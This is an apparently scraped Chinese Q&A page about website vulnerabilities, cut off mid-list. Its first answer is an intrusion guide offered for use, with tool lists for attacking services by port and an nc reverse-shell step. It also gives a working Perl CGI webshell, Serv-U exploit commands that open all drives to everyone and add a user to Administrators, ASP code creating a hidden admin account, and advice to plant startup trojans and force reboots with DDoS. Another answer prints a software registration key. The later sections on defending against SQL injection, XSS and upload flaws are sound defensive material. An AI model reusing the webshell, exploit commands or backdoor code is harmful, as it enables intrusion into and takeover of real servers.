上傳漏洞查找

1. 如何找漏洞，又怎樣利用它提權

1. 1433埠入侵
scanport.exe 查有1433的機器
sqlScanPass.exe 進行字典暴破（字典是關鍵）
最後 SQLTools.exe入侵

對sql的sp2及以下的系統，可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠
（以上反向的，測試成功）
sqlhelloz.exe 入侵ip 1433 （這個是正向連接）

2. 4899埠入侵
用4899過濾器.exe，掃描空口令的機器

3. 3899的入侵
對很早的機器，可以試試3389的溢出(win3389ex.exe)
對2000的機器，可以試試字典暴破。(tscrack.exe)

4. 80入侵
對sp3以前的機器，可以用webdav入侵；
對bbs論壇，可以試試上傳漏洞（upfile.exe或dvup_delphi.exe）
可以利用SQL進行注入。（啊D的注入軟體）。

5. serv-u入侵(21埠）
對5. 004及以下系統，可用溢出入侵。（serv5004.exe）
對5.1.0.0及以下系統，可用本地提升許可權。（servlocal.exe）
對serv-u的MD5加密密碼，可以用字典暴破。（crack.vbs）
輸入一個被serv-u加密的密碼（34位長），通過與字典檔（dict.txt）的比較，得到密碼

6. 554埠
用real554.exe入侵。

7. 6129埠
用DameWare6129.exe入侵。

8. 系統漏洞
利用135、445埠，用ms03026、ms03039、ms03049、ms04011漏洞，
進行溢出入侵。

9. 3127等埠
可以利用doom病毒開的埠，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵
利用shanlu的入侵軟體入侵（WINNTAutoAttack.exe）。
經典IPC$入侵

本篇文章結合了許多高手提升許可權的技巧和自己的一些想法

當我們取得一個webshell時候，下一部要做的就是提升許可權

個人總結如下：
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉到這個目錄，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密碼，登陸

2.C:\WINNT\system32\config\
進這里下它的SAM，破解用戶的密碼
用到破解sam密碼的軟體有LC，SAMinside

3.C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能跳轉不，我們從這里可以獲取好多有用的信息
可以看見好多快捷方式，我們一般選擇Serv-U的，然後本地查看屬性，知道路徑後，看能否跳轉
進去後，如果有許可權修改ServUDaemon.ini，加個用戶上去，密碼為空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
這個用戶具有最高許可權，然後我們就可以ftp上去 quote site exec xxx 來提升許可權

4.c:\winnt\system32\inetsrv\data\
就是這個目錄，同樣是erveryone 完全控制，我們所要做的就是把提升許可權的工具上傳上去，然後執行

5.看能否跳轉到如下目錄
c:\php, 用phpspy
c:\prel，有時候不一定是這個目錄(同樣可以通過下載快捷方式看屬性獲知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存為cgi執行,
如果不行，可以試試 pl 擴展呢，把剛才的 cgi 文件改為 pl 文件，提交 http://anyhost//cmd.pl?dir
顯示"拒絕訪問"，表示可以執行了！馬上提交：先的上傳個su.exe(ser-u提升許可權的工具)到 prel的bin目錄
http://anyhost//cmd.pl?c\perl\bin\su.exe
返回：
Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
現在是 IUSR 許可權，提交：
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息，就表示成功了
Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=2

<220 Domain settings saved

******************************************************

[+] Domain xl:2 Created

[+] Creating Evil User

<200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER xl

<331 User name okay, need password.

******************************************************

>PASS 111111

<230 User logged in, proceed.

******************************************************

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

<220 Domain deleted
這樣所有分區為everyone完全控制
現在我們把自己的用戶提升為管理員：

http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"

6.可以成功運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升許可權
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

7.還可以用這段代碼試提升，好象效果不明顯
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user","WekweN$")
od.SetPassword "WekweN" <-----密碼
od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write "WekweN$ 超級帳號建立成功!"%>

用這段代碼檢查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators組帳號
Set tN=server.CreateObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:\Program Files\Java Web Start\
這里如果可以，一般很小，可以嘗試用jsp的webshell，聽說許可權很小，本人沒有遇見過。

9.最後了，如果主機設置很變態，可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat，vbs等木馬。

等到主機重啟或者你ddos逼它重啟，來達到許可權提升的目的。

總結起來說就是，找到有執行和寫入的目錄，管他什麼目錄，然後上傳提升工具，最後執行，三個字"找" "上""執"

以上是本人的拙見，大家有什麼好的方法多多分享

2. 我的網站被人上傳了一些程序,環境是lamp的,請問如何查找漏洞呀,跪求大俠支招

一般馬的話都是eval或system執行命令的,您在網站根目錄下搜索一下這個
find . -type f -exec grep -i 'eval' -l {} \;

3. Exploit.HTML.Mht.bj

腳本病毒而已，不用擔心

推薦先用超級兔子清理系統垃圾

超級兔子魔法設置 v7.46 正式版

http://www.crsky.com/soft/2924.html

然後推薦你用最強的殺木馬軟體Ewido進行全盤殺毒！卡巴不能解決的問題它都能解決,最好先用優化軟體清楚系統垃圾!

（這是綠色版，無須安裝即可使用,網站裡面也有安裝版）

http://www.orsoon.com/Software/catalog184/2727.html

注冊碼： 6617-EBE8-D1FD-FEA2

解壓後先升級病毒庫,再運行殺毒!

最好進入安全模式殺毒

4. 如何查找網站是否有文件包含漏洞

找360或安全聯盟檢測介面， 的。
主要是查上傳漏洞。可以網路下，夠學習一段時間的。

5. 常見的漏洞類型有哪些

一、SQL 注入漏洞
SQL 注入攻擊（ SQL Injection ），簡稱注入攻擊、SQL 注入，被廣泛用於非法獲取網站控制權， 是發生在應用程序的資料庫層上的安全漏洞。在設計程序，忽略了對輸入字元串中夾帶的SQL 指令的檢查，被資料庫誤認為是正常的SQL 指令而運行，從而使資料庫受到攻擊，可能導致數據被竊取、更改、刪除，以及進一步導致網站被嵌入惡意代碼、被植入後門程序等危害。

通常情況下， SQL 注入的位置包括：

（1）表單提交，主要是POST 請求，也包括GET 請求；

（2）URL 參數提交，主要為GET 請求參數；

（3）Cookie 參數提交；

（4）HTTP 請求頭部的一些可修改的值，比如Referer 、User_Agent 等；

（5）一些邊緣的輸入點，比如.mp3 文件的一些文件信息等。

SQL 注入的危害不僅體現在資料庫層面上， 還有可能危及承載資料庫的操作系統；如果SQL 注入被用來掛馬，還可能用來傳播惡意軟體等，這些危害包括但不局限於：

（1）資料庫信息泄漏：資料庫中存放的用戶的隱私信息的泄露。作為數據的存儲中心，資料庫里往往保存著各類的隱私信息， SQL 注入攻擊能導致這些隱私信息透明於攻擊者。

（2）網頁篡改：通過操作資料庫對特定網頁進行篡改。

（3）網站被掛馬，傳播惡意軟體：修改資料庫一些欄位的值，嵌入網馬鏈接，進行掛馬攻擊。

（4）資料庫被惡意操作：資料庫伺服器被攻擊，資料庫的系統管理員帳戶被篡改。

（5）伺服器被遠程式控制制，被安裝後門。經由資料庫伺服器提供的操作系統支持，讓黑客得以修改或控制操作系統。

（6）破壞硬碟數據，癱瘓全系統。

解決SQL 注入問題的關鍵是對所有可能來自用戶輸入的數據進行嚴格的檢查、對資料庫配置使用最小許可權原則。通常使用的方案有：

（1 ）所有的查詢語句都使用資料庫提供的參數化查詢介面，參數化的語句使用參數而不是將用戶輸入變數嵌入到SQL 語句中。當前幾乎所有的資料庫系統都提供了參數化SQL 語句執行介面，使用此介面可以非常有效的防止SQL 注入攻擊。

（2 ）對進入資料庫的特殊字元（ '"\<>&*; 等）進行轉義處理，或編碼轉換。

（3 ）確認每種數據的類型，比如數字型的數據就必須是數字，資料庫中的存儲欄位必須對應為int 型。

（4）數據長度應該嚴格規定，能在一定程度上防止比較長的SQL 注入語句無法正確執行。

（5）網站每個數據層的編碼統一，建議全部使用UTF-8 編碼，上下層編碼不一致有可能導致一些過濾模型被繞過。

（6）嚴格限制網站用戶的資料庫的操作許可權，給此用戶提供僅僅能夠滿足其工作的許可權，從而最大限度的減少注入攻擊對資料庫的危害。

（7）避免網站顯示SQL 錯誤信息，比如類型錯誤、欄位不匹配等，防止攻擊者利用這些錯誤信息進行一些判斷。

（8）在網站發布之前建議使用一些專業的SQL 注入檢測工具進行檢測，及時修補這些SQL 注入漏洞。

二、跨站腳本漏洞
跨站腳本攻擊（ Cross-site scripting ，通常簡稱為XSS）發生在客戶端，可被用於進行竊取隱私、釣魚欺騙、竊取密碼、傳播惡意代碼等攻擊。XSS 攻擊使用到的技術主要為HTML 和Javascript ，也包括VBScript和ActionScript 等。XSS 攻擊對WEB 伺服器雖無直接危害，但是它藉助網站進行傳播，使網站的使用用戶受到攻擊，導致網站用戶帳號被竊取，從而對網站也產生了較嚴重的危害。

XSS 類型包括：

（1）非持久型跨站： 即反射型跨站腳本漏洞， 是目前最普遍的跨站類型。跨站代碼一般存在於鏈接中，請求這樣的鏈接時，跨站代碼經過服務端反射回來，這類跨站的代碼不存儲到服務端（比如資料庫中）。上面章節所舉的例子就是這類情況。

（2）持久型跨站：這是危害最直接的跨站類型，跨站代碼存儲於服務端（比如資料庫中）。常見情況是某用戶在論壇發貼，如果論壇沒有過濾用戶輸入的Javascript 代碼數據，就會導致其他瀏覽此貼的用戶的瀏覽器會執行發貼人所嵌入的Javascript 代碼。

（3）DOM 跨站（DOM XSS ）：是一種發生在客戶端DOM （Document Object Model 文檔對象模型）中的跨站漏洞，很大原因是因為客戶端腳本處理邏輯導致的安全問題。

XSS 的危害包括：

（1）釣魚欺騙：最典型的就是利用目標網站的反射型跨站腳本漏洞將目標網站重定向到釣魚網站，或者注入釣魚JavaScript 以監控目標網站的表單輸入，甚至發起基於DHTML 更高級的釣魚攻擊方式。

（2 ）網站掛馬：跨站時利用IFrame 嵌入隱藏的惡意網站或者將被攻擊者定向到惡意網站上，或者彈出惡意網站窗口等方式都可以進行掛馬攻擊。

（3）身份盜用： Cookie 是用戶對於特定網站的身份驗證標志， XSS 可以盜取到用戶的Cookie ，從而利用該Cookie 盜取用戶對該網站的操作許可權。如果一個網站管理員用戶Cookie 被竊取，將會對網站引發巨大的危害。

（4）盜取網站用戶信息：當能夠竊取到用戶Cookie 從而獲取到用戶身份使，攻擊者可以獲取到用戶對網站的操作許可權，從而查看用戶隱私信息。

（5）垃圾信息發送：比如在SNS 社區中，利用XSS 漏洞借用被攻擊者的身份發送大量的垃圾信息給特定的目標群。

（6）劫持用戶Web 行為：一些高級的XSS 攻擊甚至可以劫持用戶的Web 行為，監視用戶的瀏覽歷史，發送與接收的數據等等。

（7）XSS 蠕蟲：XSS 蠕蟲可以用來打廣告、刷流量、掛馬、惡作劇、破壞網上數據、實施DDoS 攻擊等。

常用的防止XSS 技術包括：

（1）與SQL 注入防護的建議一樣，假定所有輸入都是可疑的，必須對所有輸入中的script 、iframe 等字樣進行嚴格的檢查。這里的輸入不僅僅是用戶可以直接交互的輸入介面，也包括HTTP 請求中的Cookie 中的變數， HTTP 請求頭部中的變數等。

（2 ）不僅要驗證數據的類型，還要驗證其格式、長度、范圍和內容。

（3）不要僅僅在客戶端做數據的驗證與過濾，關鍵的過濾步驟在服務端進行。

（ 4）對輸出的數據也要檢查， 資料庫里的值有可能會在一個大網站的多處都有輸出，即使在輸入做了編碼等操作，在各處的輸出點時也要進行安全檢查。

（5）在發布應用程序之前測試所有已知的威脅。

三、弱口令漏洞
弱口令(weak password) 沒有嚴格和准確的定義，通常認為容易被別人（他們有可能對你很了解）猜測到或被破解工具破解的口令均為弱口令。設置密碼通常遵循以下原則：

（1）不使用空口令或系統預設的口令，這些口令眾所周之，為典型的弱口令。

（2）口令長度不小於8 個字元。

（3）口令不應該為連續的某個字元（例如： AAAAAAAA ）或重復某些字元的組合（例如： tzf.tzf. ）。

（4）口令應該為以下四類字元的組合，大寫字母(A-Z) 、小寫字母(a-z) 、數字(0-9) 和特殊字元。每類字元至少包含一個。如果某類字元只包含一個，那麼該字元不應為首字元或尾字元。

（5）口令中不應包含本人、父母、子女和配偶的姓名和出生日期、紀念日期、登錄名、E-mail 地址等等與本人有關的信息，以及字典中的單詞。

（6）口令不應該為用數字或符號代替某些字母的單詞。

（7）口令應該易記且可以快速輸入，防止他人從你身後很容易看到你的輸入。

（8）至少90 天內更換一次口令，防止未被發現的入侵者繼續使用該口令。

四、HTTP 報頭追蹤漏洞
HTTP/1.1 （RFC2616 ）規范定義了HTTP TRACE 方法，主要是用於客戶端通過向Web 伺服器提交TRACE 請求來進行測試或獲得診斷信息。當Web 伺服器啟用TRACE 時，提交的請求頭會在伺服器響應的內容（Body ）中完整的返回，其中HTTP 頭很可能包括Session Token 、Cookies 或其它認證信息。攻擊者可以利用此漏洞來欺騙合法用戶並得到他們的私人信息。該漏洞往往與其它方式配合來進行有效攻擊，由於HTTP TRACE 請求可以通過客戶瀏覽器腳本發起（如XMLHttpRequest ），並可以通過DOM 介面來訪問，因此很容易被攻擊者利用。防禦HTTP 報頭追蹤漏洞的方法通常禁用HTTP TRACE 方法。

五、Struts2 遠程命令執行漏洞
Apache Struts 是一款建立Java web 應用程序的開放源代碼架構。Apache Struts 存在一個輸入過濾錯誤，如果遇到轉換錯誤可被利用注入和執行任意Java 代碼。網站存在遠程代碼執行漏洞的大部分原因是由於網站採用了Apache Struts Xwork 作為網站應用框架，由於該軟體存在遠程代碼執高危漏洞，導致網站面臨安全風險。CNVD 處置過諸多此類漏洞，例如：「 GPS 車載衛星定位系統」網站存在遠程命令執行漏洞(CNVD-2012-13934) ；Aspcms 留言本遠程代碼執行漏洞（ CNVD-2012-11590 ）等。

修復此類漏洞，只需到Apache 官網升級Apache Struts 到最新版本

六、框架釣魚漏洞（框架注入漏洞）
框架注入攻擊是針對Internet Explorer 5 、Internet Explorer 6 、與Internet Explorer 7 攻擊的一種。這種攻擊導致Internet Explorer 不檢查結果框架的目的網站，因而允許任意代碼像Javascript 或者VBScript 跨框架存取。這種攻擊也發生在代碼透過多框架注入，肇因於腳本並不確認來自多框架的輸入。這種其他形式的框架注入會影響所有的不確認不受信任輸入的各廠商瀏覽器和腳本。如果應用程序不要求不同的框架互相通信，就可以通過完全刪除框架名稱、使用匿名框架防止框架注入。但是，因為應用程序通常都要求框架之間相互通信，因此這種方法並不可行。因此，通常使用命名框架，但在每個會話中使用不同的框架，並且使用無法預測的名稱。一種可行的方法是在每個基本的框架名稱後附加用戶的會話令牌，如main_display 。

七、文件上傳漏洞
文件上傳漏洞通常由於網頁代碼中的文件上傳路徑變數過濾不嚴造成的，如果文件上傳功能實現代碼沒有嚴格限制用戶上傳的文件後綴以及文件類型，攻擊者可通過Web 訪問的目錄上傳任意文件，包括網站後門文件（ webshell ），進而遠程式控制制網站伺服器。因此，在開發網站及應用程序過程中，需嚴格限制和校驗上傳的文件，禁止上傳惡意代碼的文件。同時限制相關目錄的執行許可權，防範webshell 攻擊。

八、應用程序測試腳本泄露
由於測試腳本對提交的參數數據缺少充分過濾，遠程攻擊者可以利用洞以WEB 進程許可權在系統上查看任意文件內容。防禦此類漏洞通常需嚴格過濾提交的數據，有效檢測攻擊。

九、私有IP 地址泄露漏洞
IP 地址是網路用戶的重要標示，是攻擊者進行攻擊前需要了解的。獲取的方法較多，攻擊者也會因不同的網路情況採取不同的方法，如：在區域網內使用Ping 指令， Ping 對方在網路中的名稱而獲得IP；在Internet 上使用IP 版的QQ直接顯示。最有效的辦法是截獲並分析對方的網路數據包。攻擊者可以找到並直接通過軟體解析截獲後的數據包的IP 包頭信息，再根據這些信息了解具體的IP。針對最有效的「數據包分析方法」而言，就可以安裝能夠自動去掉發送數據包包頭IP 信息的一些軟體。不過使用這些軟體有些缺點， 譬如：耗費資源嚴重，降低計算機性能；訪問一些論壇或者網站時會受影響；不適合網吧用戶使用等等。現在的個人用戶採用最普及隱藏IP 的方法應該是使用代理，由於使用代理伺服器後，「轉址服務」會對發送出去的數據包有所修改，致使「數據包分析」的方法失效。一些容易泄漏用戶IP 的網路軟體(QQ 、MSN 、IE 等)都支持使用代理方式連接Internet ，特別是QQ 使用「 ezProxy 」等代理軟體連接後， IP 版的QQ 都無法顯示該IP 地址。雖然代理可以有效地隱藏用戶IP，但攻擊者亦可以繞過代理， 查找到對方的真實IP 地址，用戶在何種情況下使用何種方法隱藏IP，也要因情況而論。

十、未加密登錄請求
由於Web 配置不安全， 登陸請求把諸如用戶名和密碼等敏感欄位未加密進行傳輸， 攻擊者可以竊聽網路以劫獲這些敏感信息。建議進行例如SSH 等的加密後再傳輸。

十一、敏感信息泄露漏洞
SQL 注入、XSS、目錄遍歷、弱口令等均可導致敏感信息泄露，攻擊者可以通過漏洞獲得敏感信息。針對不同成因，防禦方式不同。

6. APP漏洞如何檢測，如何檢測出app有漏洞

常見的APP漏洞及風險有：界面截取、輸入法攻擊、協議抓取、靜態破解、本地存儲數據竊取等。一般來說，檢測App從下面這幾個方面進行：
1 程序機密性檢測：檢查代碼混淆、dex保護監測、so保護監測、程序簽名檢測等安全問題。
2 組件安全檢測：掃描代碼組件的Activity、Broadcast Receiver、service、Content Provider存在的安全漏洞。
3 數據及業務安全檢測：檢測APP是否存在數據安全問題，用戶賬號密碼泄漏等風險。
參考內容：http://www.ineice.com/

7. 滲透測試應該怎麼做呢

01、信息收集
1、域名、IP、埠
域名信息查詢：信息可用於後續滲透
IP信息查詢：確認域名對應IP，確認IP是否真實，確認通信是否正常
埠信息查詢：NMap掃描，確認開放埠
發現：一共開放兩個埠，80為web訪問埠，3389為windows遠程登陸埠，嘿嘿嘿，試一下
發現：是Windows Server 2003系統，OK，到此為止。
2、指紋識別
其實就是網站的信息。比如通過可以訪問的資源，如網站首頁，查看源代碼:
看看是否存在文件遍歷的漏洞（如圖片路徑，再通過…/遍歷文件）
是否使用了存在漏洞的框架（如果沒有現成的就自己挖）
02、漏洞掃描
1、主機掃描
Nessus
經典主機漏掃工具，看看有沒有CVE漏洞：
2、Web掃描
AWVS（Acunetix | Website Security Scanner）掃描器
PS：掃描器可能會對網站構成傷害，小心謹慎使用。
03、滲透測試
1、弱口令漏洞
漏洞描述
目標網站管理入口（或資料庫等組件的外部連接）使用了容易被猜測的簡單字元口令、或者是默認系統賬號口令。
滲透測試
① 如果不存在驗證碼，則直接使用相對應的弱口令字典使用burpsuite 進行爆破
② 如果存在驗證碼，則看驗證碼是否存在繞過、以及看驗證碼是否容易識別
風險評級：高風險
安全建議
① 默認口令以及修改口令都應保證復雜度，比如：大小寫字母與數字或特殊字元的組合，口令長度不小於8位等
② 定期檢查和更換網站管理口令
2、文件下載（目錄瀏覽）漏洞
漏洞描述
一些網站由於業務需求，可能提供文件查看或下載的功能，如果對用戶查看或下載的文件不做限制，則惡意用戶就能夠查看或下載任意的文件，可以是源代碼文件、敏感文件等。
滲透測試
① 查找可能存在文件包含的漏洞點，比如js，css等頁面代碼路徑
② 看看有沒有文件上傳訪問的功能
③ 採用…/來測試能否誇目錄訪問文件
風險評級：高風險
安全建議
① 採用白名單機制限制伺服器目錄的訪問，以及可以訪問的文件類型(小心被繞過)
② 過濾【./】等特殊字元
③ 採用文件流的訪問返回上傳文件（如用戶頭像），不要通過真實的網站路徑。
示例：tomcat，默認關閉路徑瀏覽的功能：
<param-name>listings</param-name>
<param-value>false</param-value>

3、任意文件上傳漏洞
漏洞描述
目標網站允許用戶向網站直接上傳文件，但未對所上傳文件的類型和內容進行嚴格的過濾。

滲透測試

① 收集網站信息，判斷使用的語言（PHP，ASP，JSP）
② 過濾規則繞過方法：文件上傳繞過技巧

風險評級：高風險

安全建議

① 對上傳文件做有效文件類型判斷，採用白名單控制的方法，開放只允許上傳的文件型式；

② 文件類型判斷，應對上傳文件的後綴、文件頭、圖片類的預覽圖等做檢測來判斷文件類型，同時注意重命名（Md5加密）上傳文件的文件名避免攻擊者利用WEB服務的缺陷構造畸形文件名實現攻擊目的；

③ 禁止上傳目錄有執行許可權；

④ 使用隨機數改寫文件名和文件路徑，使得用戶不能輕易訪問自己上傳的文件。

4、命令注入漏洞

漏洞描述

目標網站未對用戶輸入的字元進行特殊字元過濾或合法性校驗，允許用戶輸入特殊語句，導致各種調用系統命令的web應用，會被攻擊者通過命令拼接、繞過黑名單等方式，在服務端運行惡意的系統命令。

滲透測試

風險評級：高風險

安全建議

① 拒絕使用拼接語句的方式進行參數傳遞；

② 盡量使用白名單的方式（首選方式）；

③ 過濾危險方法、特殊字元，如：【|】【&】【；】【』】【"】等

5、SQL注入漏洞

漏洞描述

目標網站未對用戶輸入的字元進行特殊字元過濾或合法性校驗，允許用戶輸入特殊語句查詢後台資料庫相關信息

滲透測試

① 手動測試：判斷是否存在SQL注入，判斷是字元型還是數字型，是否需要盲注

② 工具測試：使用sqlmap等工具進行輔助測試

風險評級：高風險

安全建議

① 防範SQL注入攻擊的最佳方式就是將查詢的邏輯與其數據分隔，如Java的預處理，PHP的PDO

② 拒絕使用拼接SQL的方式

6、跨站腳本漏洞

漏洞描述

當應用程序的網頁中包含不受信任的、未經恰當驗證或轉義的數據時，或者使用可以創建 HTML或JavaScript 的瀏覽器 API 更新現有的網頁時，就會出現 XSS 缺陷。XSS 讓攻擊者能夠在受害者的瀏覽器中執行腳本，並劫持用戶會話、破壞網站或將用戶重定向到惡意站點。

三種XSS漏洞：

① 存儲型：用戶輸入的信息被持久化，並能夠在頁面顯示的功能，都可能存在存儲型XSS，例如用戶留言、個人信息修改等。

② 反射型：URL參數需要在頁面顯示的功能都可能存在反射型跨站腳本攻擊，例如站內搜索、查詢功能。

③ DOM型：涉及DOM對象的頁面程序，包括：document.URL、document.location、document.referrer、window.location等

滲透測試

存儲型，反射型，DOM型

風險評級：高風險

安全建議

① 不信任用戶提交的任何內容，對用戶輸入的內容，在後台都需要進行長度檢查，並且對【<】【>】【"】【』】【&】等字元做過濾
② 任何內容返回到頁面顯示之前都必須加以html編碼，即將【<】【>】【"】【』】【&】進行轉義。

7、跨站請求偽造漏洞

漏洞描述

CSRF，全稱為Cross-Site Request Forgery，跨站請求偽造，是一種網路攻擊方式，它可以在用戶毫不知情的情況下，以用戶的名義偽造請求發送給被攻擊站點，從而在未授權的情況下進行許可權保護內的操作，如修改密碼，轉賬等。

滲透測試

風險評級：中風險（如果相關業務極其重要，則為高風險）

安全建議

① 使用一次性令牌：用戶登錄後產生隨機token並賦值給頁面中的某個Hidden標簽，提交表單時候，同時提交這個Hidden標簽並驗證，驗證後重新產生新的token，並賦值給hidden標簽；

② 適當場景添加驗證碼輸入：每次的用戶提交都需要用戶在表單中填寫一個圖片上的隨機字元串；

③ 請求頭Referer效驗，url請求是否前部匹配Http(s)😕/ServerHost

④ 關鍵信息輸入確認提交信息的用戶身份是否合法，比如修改密碼一定要提供原密碼輸入

⑤ 用戶自身可以通過在瀏覽其它站點前登出站點或者在瀏覽器會話結束後清理瀏覽器的cookie；

8、內部後台地址暴露

漏洞描述

一些僅被內部訪問的地址，對外部暴露了，如：管理員登陸頁面；系統監控頁面；API介面描述頁面等，這些會導致信息泄露，後台登陸等地址還可能被爆破。

滲透測試

① 通過常用的地址進行探測，如login.html，manager.html，api.html等；

② 可以借用burpsuite和常規頁面地址字典，進行掃描探測

風險評級：中風險

安全建議

① 禁止外網訪問後台地址

② 使用非常規路徑（如對md5加密）

9、信息泄露漏洞

漏洞描述

① 備份信息泄露：目標網站未及時刪除編輯器或者人員在編輯文件時，產生的臨時文件，或者相關備份信息未及時刪除導致信息泄露。

② 測試頁面信息泄露：測試界面未及時刪除，導致測試界面暴露，被他人訪問。

③ 源碼信息泄露：目標網站文件訪問控制設置不當，WEB伺服器開啟源碼下載功能，允許用戶訪問網站源碼。

④ 錯誤信息泄露：目標網站WEB程序和伺服器未屏蔽錯誤信息回顯，頁面含有CGI處理錯誤的代碼級別的詳細信息，例如SQL語句執行錯誤原因，PHP的錯誤行數等。

⑤ 介面信息泄露：目標網站介面訪問控制不嚴，導致網站內部敏感信息泄露。

滲透測試

① 備份信息泄露、測試頁面信息泄露、源碼信息泄露，測試方法：使用字典，爆破相關目錄，看是否存在相關敏感文件

② 錯誤信息泄露，測試方法：發送畸形的數據報文、非正常的報文進行探測，看是否對錯誤參數處理妥當。

③ 介面信息泄露漏洞，測試方法：使用爬蟲或者掃描器爬取獲取介面相關信息，看目標網站對介面許可權是否合理

風險評級：一般為中風險，如果源碼大量泄漏或大量客戶敏感信息泄露。

安全建議

① 備份信息泄露漏洞：刪除相關備份信息，做好許可權控制

② 測試頁面信息泄露漏洞：刪除相關測試界面，做好許可權控制

③ 源碼信息泄露漏洞：做好許可權控制

④ 錯誤信息泄露漏洞：將錯誤信息對用戶透明化，在CGI處理錯誤後可以返回友好的提示語以及返回碼。但是不可以提示用戶出錯的代碼級別的詳細原因

⑤ 介面信息泄露漏洞：對介面訪問許可權嚴格控制

10、失效的身份認證

漏洞描述

通常，通過錯誤使用應用程序的身份認證和會話管理功能，攻擊者能夠破譯密碼、密鑰或會話令牌， 或者利用其它開發缺陷來暫時性或永久性冒充其他用戶的身份。

滲透測試

① 在登陸前後觀察，前端提交信息中，隨機變化的數據，總有與當前已登陸用戶進行綁定的會話唯一標識，常見如cookie

② 一般現在網站沒有那種簡單可破解的標識，但是如果是跨站認證，單點登錄場景中，可能為了開發方便而簡化了身份認證

風險評級：高風險

安全建議

① 使用強身份識別，不使用簡單弱加密方式進行身份識別；

② 伺服器端使用安全的會話管理器，在登錄後生成高度復雜的新隨機會話ID。會話ID不能在URL中，可以安全地存儲，在登出、閑置超時後使其失效。

11、失效的訪問控制

漏洞描述

未對通過身份驗證的用戶實施恰當的訪問控制。攻擊者可以利用這些缺陷訪問未經授權的功能或數據，例如：訪問其他用戶的帳戶、查看敏感文件、修改其他用戶的數據、更改訪問許可權等。

滲透測試

① 登入後，通過burpsuite 抓取相關url 鏈接，獲取到url 鏈接之後，在另一個瀏覽器打開相關鏈接，看能夠通過另一個未登入的瀏覽器直接訪問該功能點。

② 使用A用戶登陸，然後在另一個瀏覽器使用B用戶登陸，使用B訪問A獨有的功能，看能否訪問。

風險評級：高風險

安全建議

① 除公有資源外，默認情況下拒絕訪問非本人所有的私有資源；

② 對API和控制器的訪問進行速率限制，以最大限度地降低自動化攻擊工具的危害；

③ 當用戶注銷後，伺服器上的Cookie，JWT等令牌應失效；

④ 對每一個業務請求，都進行許可權校驗。

12、安全配置錯誤

漏洞描述

應用程序缺少適當的安全加固，或者雲服務的許可權配置錯誤。

① 應用程序啟用或安裝了不必要的功能（例如：不必要的埠、服務、網頁、帳戶或許可權）。

② 默認帳戶的密碼仍然可用且沒有更改。

③ 錯誤處理機制向用戶披露堆棧跟蹤或其他大量錯誤信息。

④ 對於更新的系統，禁用或不安全地配置最新的安全功能。

⑤ 應用程序伺服器、應用程序框架（如：Struts、Spring、ASP.NET）、庫文件、資料庫等沒有進行相關安全配置。

滲透測試

先對應用指紋等進行信息搜集，然後針對搜集的信息，看相關應用默認配置是否有更改，是否有加固過；埠開放情況，是否開放了多餘的埠；

風險評級：中風險

安全建議

搭建最小化平台，該平台不包含任何不必要的功能、組件、文檔和示例。移除或不安裝不適用的功能和框架。在所有環境中按照標準的加固流程進行正確安全配置。

13、使用含有已知漏洞的組件

